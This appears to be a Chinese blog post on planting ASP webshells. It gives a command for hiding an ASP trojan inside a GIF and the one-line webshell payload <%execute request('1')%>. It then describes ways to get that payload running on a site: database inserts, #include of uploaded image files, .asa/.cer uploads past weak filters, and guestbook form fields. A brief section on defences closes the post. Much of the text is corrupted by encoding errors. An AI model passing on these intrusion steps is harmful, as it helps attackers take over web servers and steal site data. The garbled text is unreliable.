关于 asp 木马
一、木馬生成
asp木馬代碼加密,圖片合并,文件時(shí)間修改,還有要命的系統(tǒng)漏洞利用
?
圖片和木馬合并命令:
copy 1.gif /b + asp.asp /a asp.gif
?
二、木馬上傳
如果后臺(tái)沒(méi)有類似數(shù)據(jù)庫(kù)備份功能,可以生成新文件,或者直接修改文件。那么很難直接讓木馬運(yùn)行,不過(guò)還是有一些方法,可以考慮。??
? 1、如果后臺(tái)數(shù)據(jù)庫(kù)是以asp格式存儲(chǔ)的。那么可以采用在數(shù)據(jù)庫(kù)中插入一句話木馬(<%execute???? request("1")%>),然后利用一句話木馬上傳一個(gè)完整木馬。??
? 2、如果網(wǎng)站后臺(tái)允許修改網(wǎng)站聯(lián)系信息等頁(yè)面,而且頁(yè)面也是也是以asp存儲(chǔ),那么可以利用asp的包含文件,巧妙的令jpg、bmp等格式木馬得以運(yùn)行。比如在其中插入??
? <!--?? #include?? file=/upload/****.jpg?? -->??
? 3、還可以看看網(wǎng)站上傳類型是否有嚴(yán)格的過(guò)濾,如果僅僅是限制了asp文件,那么可以嘗試上傳asa、cer等等。
??
? 作為技術(shù)性問(wèn)題,可以這樣實(shí)現(xiàn)。??
? 一般情況下,在留言板、個(gè)人注冊(cè)等地方,需要個(gè)人信息。??
? 而且在進(jìn)行個(gè)人信息中的個(gè)人主頁(yè)、郵件地址等信息,不會(huì)有太嚴(yán)格的過(guò)濾。這就為插入一句話木馬提供了可能性。??
? 舉例說(shuō)明:我給一個(gè)網(wǎng)站留言,我在填寫我的“個(gè)人主頁(yè)”或者“email”時(shí),不輸入真實(shí)信息。而輸入一句話木馬。這樣,只要知道了asp數(shù)據(jù)庫(kù)地址,那么提交一句話木馬后,直接訪問(wèn)asp數(shù)據(jù)庫(kù)就可運(yùn)行木馬了。??
? 所以,很多人把a(bǔ)cess數(shù)據(jù)庫(kù)改名為asp以防止下載,豈不知危害照樣存在,只不過(guò)換了一種方式而已。
??
?
三、如何防護(hù)?
? 1、是的,對(duì)方猜出正確的數(shù)據(jù)庫(kù)路徑的幾率和同一地點(diǎn)被雷集中兩次幾率幾乎相同。但是需要注意的是在寫連接數(shù)據(jù)庫(kù)文件時(shí),注意防止暴庫(kù)??
? 2、是的,而且如果你的數(shù)據(jù)庫(kù)不是以asp存放,那么就無(wú)所謂了。??
? 3、這個(gè)問(wèn)題有點(diǎn)大。估計(jì)網(wǎng)上的討論也沒(méi)有停止過(guò),個(gè)人認(rèn)為也沒(méi)有標(biāo)準(zhǔn)答案。不過(guò),我認(rèn)為安全是一個(gè)整體,必須從多個(gè)方面考慮,以分層次防御的方法無(wú)疑是一個(gè)好辦法。??
???
? 我自己通常是從兩個(gè)層次進(jìn)行防護(hù),其一就是數(shù)據(jù)庫(kù)改名(包括文件名和后綴名)最好改為你自己都記不住又長(zhǎng)的那種。這樣別猜測(cè)的可能性降到最低。這是從asp層面進(jìn)行防護(hù),也是現(xiàn)在最常用,最流行的方法??
? 其二,如果你的數(shù)據(jù)庫(kù)已經(jīng)暴露(由于一些別的原因或者未知的漏洞),那么也還是有辦法的,這就是第二層防護(hù),從iis層面進(jìn)行防護(hù)(但這有個(gè)要求,就是你要具有iis管理權(quán)限),方法如下,運(yùn)用iis的url重定向功能。在iis配置中,將數(shù)據(jù)庫(kù)文件永久重定向到某個(gè)固定的url(當(dāng)然,你可以事先在這個(gè)url寫好一些問(wèn)候的頁(yè)面)。這樣所有從外部提交的請(qǐng)求都會(huì)被送到那個(gè)url而你的數(shù)據(jù)安然無(wú)恙,即使別人知道了數(shù)據(jù)庫(kù)真實(shí)地址,也只能忘庫(kù)興嘆。
?
總結(jié)
- 上一篇: asp木马探测器
- 下一篇: 洛谷P2071 座位安排